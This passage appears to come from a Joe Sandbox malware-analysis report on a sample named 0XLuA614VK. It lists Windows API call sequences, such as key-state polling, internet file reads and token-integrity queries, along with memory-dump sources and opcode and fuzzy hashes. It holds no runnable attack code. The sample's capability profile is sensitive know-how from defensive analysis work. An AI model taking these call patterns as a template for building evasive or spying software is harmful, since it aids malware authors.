                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FB6CC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: f3ecde8f3e4d810b172b75557ffcc41593c66f97780a421afca49265719151c8
                                                      • Instruction ID: b9bd3641d907f52b48e091929be998a64e0ce68d7fdd8f49421cf5588c4ec65f
                                                      • Opcode Fuzzy Hash: f3ecde8f3e4d810b172b75557ffcc41593c66f97780a421afca49265719151c8
                                                      • Instruction Fuzzy Hash: 5641C475A00108AFD724DF2ACC94FE67FA5EB49360F150224F995E72A0C375AD40EE90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: c13db00ffcf204bfc2093dea8704e9e7261cd32b8a2e21714c0b1b5a37c84a48
                                                      • Instruction ID: 209937588b1c3d86b29b91490467222c9bcfe4ba7f6aa77ed54db62b77b1360d
                                                      • Opcode Fuzzy Hash: c13db00ffcf204bfc2093dea8704e9e7261cd32b8a2e21714c0b1b5a37c84a48
                                                      • Instruction Fuzzy Hash: 8641E432E006049FCB20DF78C880A5EB7B5EF8A721F154669EA15EB391D731AD05EB80
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00F39141
                                                      • ScreenToClient.USER32(00000000,?), ref: 00F3915E
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00F39183
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00F3919D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 7bfd200128032294fb048b2a2478732400d413e5a4e73b347034d6153946cd07
                                                      • Instruction ID: 0bb113d781772a03b78f8385993d6d80169408b3eb994be1673be910e8403eec
                                                      • Opcode Fuzzy Hash: 7bfd200128032294fb048b2a2478732400d413e5a4e73b347034d6153946cd07
                                                      • Instruction Fuzzy Hash: 2E414071A0861ABBDF15AF64C844BEEB775FB05334F208216E429A7290C7B46950EF92
                                                      APIs
                                                      • GetInputState.USER32 ref: 00F938CB
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F93922
                                                      • TranslateMessage.USER32(?), ref: 00F9394B
                                                      • DispatchMessageW.USER32(?), ref: 00F93955
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F93966
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID:
                                                      • API String ID: 2256411358-0
                                                      • Opcode ID: 43c318a48ba92a0a6fdc6061bf9c2c714656401e8cd4f4a755b3eca194b8c375
                                                      • Instruction ID: ca5552387c0347bb505ec51eec188a82088ecf7325043a85035a0a76017da037
                                                      • Opcode Fuzzy Hash: 43c318a48ba92a0a6fdc6061bf9c2c714656401e8cd4f4a755b3eca194b8c375
                                                      • Instruction Fuzzy Hash: ED31E071D0434ADEFF35CB349848BB637A9AF11310F08056DE466C21A0E3F4AA88FB61
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00F9CF38
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00F9CF6F
                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00F9C21E,00000000), ref: 00F9CFB4
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F9C21E,00000000), ref: 00F9CFC8
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F9C21E,00000000), ref: 00F9CFF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 3191363074-0
                                                      • Opcode ID: 520ebec9a1734860ba29adc917fe744d0ad7c0001add7a6bc2b6087f38ea9066
                                                      • Instruction ID: 74bfcbfea81f288cf39e0a409c6f9252fdaa4b00b1be61a48e9531c6b1659260
                                                      • Opcode Fuzzy Hash: 520ebec9a1734860ba29adc917fe744d0ad7c0001add7a6bc2b6087f38ea9066
                                                      • Instruction Fuzzy Hash: 69315271900205EFEF20DFA5C884AABBBF9EB14364B10442EF516D3141DB30AE45EBB0
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00F81915
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F819C1
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00F819C9
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F819DA
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F819E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: da3909381010dd636f22598a4b5b5f72f791b3d3aa1392bb317be433511eb2a4
                                                      • Instruction ID: 47793b0aad7005253fde3b3bf184be97213f34d5084b0f487874717f4c53b2d4
                                                      • Opcode Fuzzy Hash: da3909381010dd636f22598a4b5b5f72f791b3d3aa1392bb317be433511eb2a4
                                                      • Instruction Fuzzy Hash: 7E31AF72A00219EFCB10DFA8CD99AEE3BB9FB04325F104325F965A72D1C7709955EB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FB5745
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FB579D
                                                      • _wcslen.LIBCMT ref: 00FB57AF
                                                      • _wcslen.LIBCMT ref: 00FB57BA
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FB5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: d2feed696fc851340fef42887e458af97aab511b2bd68495c03ecc6ffb70f31e
                                                      • Instruction ID: 334a57a13414ad0c3fb2b538b2de633fd85e19efcc100d96be10345aadd4d98e
                                                      • Opcode Fuzzy Hash: d2feed696fc851340fef42887e458af97aab511b2bd68495c03ecc6ffb70f31e
                                                      • Instruction Fuzzy Hash: 76217371D04618EADB20DFA1CC85BEE7BB8FF04B24F108216E919EB180D7789985EF50
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00FA0951
                                                      • GetForegroundWindow.USER32 ref: 00FA0968
                                                      • GetDC.USER32(00000000), ref: 00FA09A4
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00FA09B0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00FA09E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: e0284f69cac42d98e3f081659b999992de895e3d874e6fa18767c4b97cd2eeb8
                                                      • Instruction ID: 2629690a586370d2865f2d0ac68fbefd4794ebe5602cd863a8ad3fb22162cc79
                                                      • Opcode Fuzzy Hash: e0284f69cac42d98e3f081659b999992de895e3d874e6fa18767c4b97cd2eeb8
                                                      • Instruction Fuzzy Hash: 40218175A00214AFD714EF69DC85AAFBBE9EF49700F048168F84A97752CB34AC04EF90
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00F5CDC6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5CDE9
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F5CE0F
                                                      • _free.LIBCMT ref: 00F5CE22
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F5CE31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: e6cff1b95f784c6e9b2ee483024e15b3b021080cccf223605d2002ee4c2768a2
                                                      • Instruction ID: 90f29dac6f09868623ab7830d826af375b4beba5ba1b5d1148c4063843566ebf
                                                      • Opcode Fuzzy Hash: e6cff1b95f784c6e9b2ee483024e15b3b021080cccf223605d2002ee4c2768a2
                                                      • Instruction Fuzzy Hash: 02018472A013157F232116BA6C8AD7B7A6DDEC6FA23150229FE06D7201EA658D06B5F0
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F39693
                                                      • SelectObject.GDI32(?,00000000), ref: 00F396A2
                                                      • BeginPath.GDI32(?), ref: 00F396B9
                                                      • SelectObject.GDI32(?,00000000), ref: 00F396E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 3c436649ac29484939f8e447c50a70727552b03f8a13227e09f8f71a763be466
                                                      • Instruction ID: 872cf64a8b14ba9f533f28092a1f14a96122c2873421641c66c6a1b4e4ba4b30
                                                      • Opcode Fuzzy Hash: 3c436649ac29484939f8e447c50a70727552b03f8a13227e09f8f71a763be466
                                                      • Instruction Fuzzy Hash: 67215931806309EBDB21AF29EC597BA3BA8BF10375F104216F810A61A0D3F09895FFD0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: b4726f63d9cedda8892e4822430b1449c39093e371a61eaaba6fa3d4f2b0eed7
                                                      • Instruction ID: 9909f2a0a758df9e015b06282dbefe2d06119b0a9c480f43c05f8b3b6b87aad5
                                                      • Opcode Fuzzy Hash: b4726f63d9cedda8892e4822430b1449c39093e371a61eaaba6fa3d4f2b0eed7
                                                      • Instruction Fuzzy Hash: B901F5A6A4160DBBE2086511DD82FFF774CAB60BA4F40C030FD049E241F724EE54B7A5
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00F4F2DE,00F53863,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6), ref: 00F52DFD
                                                      • _free.LIBCMT ref: 00F52E32
                                                      • _free.LIBCMT ref: 00F52E59
                                                      • SetLastError.KERNEL32(00000000,00F21129), ref: 00F52E66
                                                      • SetLastError.KERNEL32(00000000,00F21129), ref: 00F52E6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: a6b69becad45e5714b87240b4991ac4134bf2bb3d1a7385c8af183d264e783b0
                                                      • Instruction ID: df91fbbeffaab14d111be54494cd836afe8fc75fdd480450c8311a426c9aa5c5
                                                      • Opcode Fuzzy Hash: a6b69becad45e5714b87240b4991ac4134bf2bb3d1a7385c8af183d264e783b0
                                                      • Instruction Fuzzy Hash: 0801FE3250590467C65227756C87D2B3659ABD37B7B244319FF25A2192DE289C0D7160
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?,?,00F8035E), ref: 00F8002B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80046
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80054
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?), ref: 00F80064
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80070
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: defde1fc910db0b33cdfe50155bfe5cd5ed9f9b57ec05eb903f19d1bf9d1ffc6
                                                      • Instruction ID: 7f70bc69afeded64db4d8b11e22a8a64a168fc58e120c6e4ba06bb765e098545
                                                      • Opcode Fuzzy Hash: defde1fc910db0b33cdfe50155bfe5cd5ed9f9b57ec05eb903f19d1bf9d1ffc6
                                                      • Instruction Fuzzy Hash: 9D01AD72A00208BFDB516F68DC84BEB7AEDEF447A2F544224F905D6210EB71DD44BBA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00F8E997
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00F8E9A5
                                                      • Sleep.KERNEL32(00000000), ref: 00F8E9AD
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00F8E9B7
                                                      • Sleep.KERNEL32 ref: 00F8E9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: dabda5f3313947edc3c52f31b3fb5b1e014770a4ce2d976e1c6dfc20eb45fc0f
                                                      • Instruction ID: 513b1be34442cf7a3466fc27499b09ead708957d237168f37322d8b6441f3a56
                                                      • Opcode Fuzzy Hash: dabda5f3313947edc3c52f31b3fb5b1e014770a4ce2d976e1c6dfc20eb45fc0f
                                                      • Instruction Fuzzy Hash: F8019E31D0162DDBCF00AFE9DC89AEEBB78FF09311F000646E542B2241CB709550EBA1
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F81114
                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81120
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F8112F
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81136
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F8114D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: c290f55ca697fab31355cda462a5573ffc5d27aa8cac6e60a63a6e2f280561cb
                                                      • Instruction ID: 44fd36452db0b13f1cceae11547c1c14c3e6f99bbf04e7f6795d1188367d26af
                                                      • Opcode Fuzzy Hash: c290f55ca697fab31355cda462a5573ffc5d27aa8cac6e60a63a6e2f280561cb
                                                      • Instruction Fuzzy Hash: 3A016D75500609BFDB115F65DC8DAAB3B6EFF85360B210515FA45D3360DA31DC00AFA0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F80FCA
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F80FD6
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F80FE5
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F80FEC
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F81002
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: d550bd87a0c877c6d0cee40b708d4b41df6523d8e66238c8fde6bc99aa33f45a
                                                      • Instruction ID: fbc93b2f0bcdd080ac393199d98b5940c51e678a3558ffeb9e8043f56a6ad571
                                                      • Opcode Fuzzy Hash: d550bd87a0c877c6d0cee40b708d4b41df6523d8e66238c8fde6bc99aa33f45a
                                                      • Instruction Fuzzy Hash: 3DF0A975200309ABDB212FA99C89F973BADFF89762F100525FA49D6251CA30DC40AEA0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F8102A
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F81036
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81045
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F8104C
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81062
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
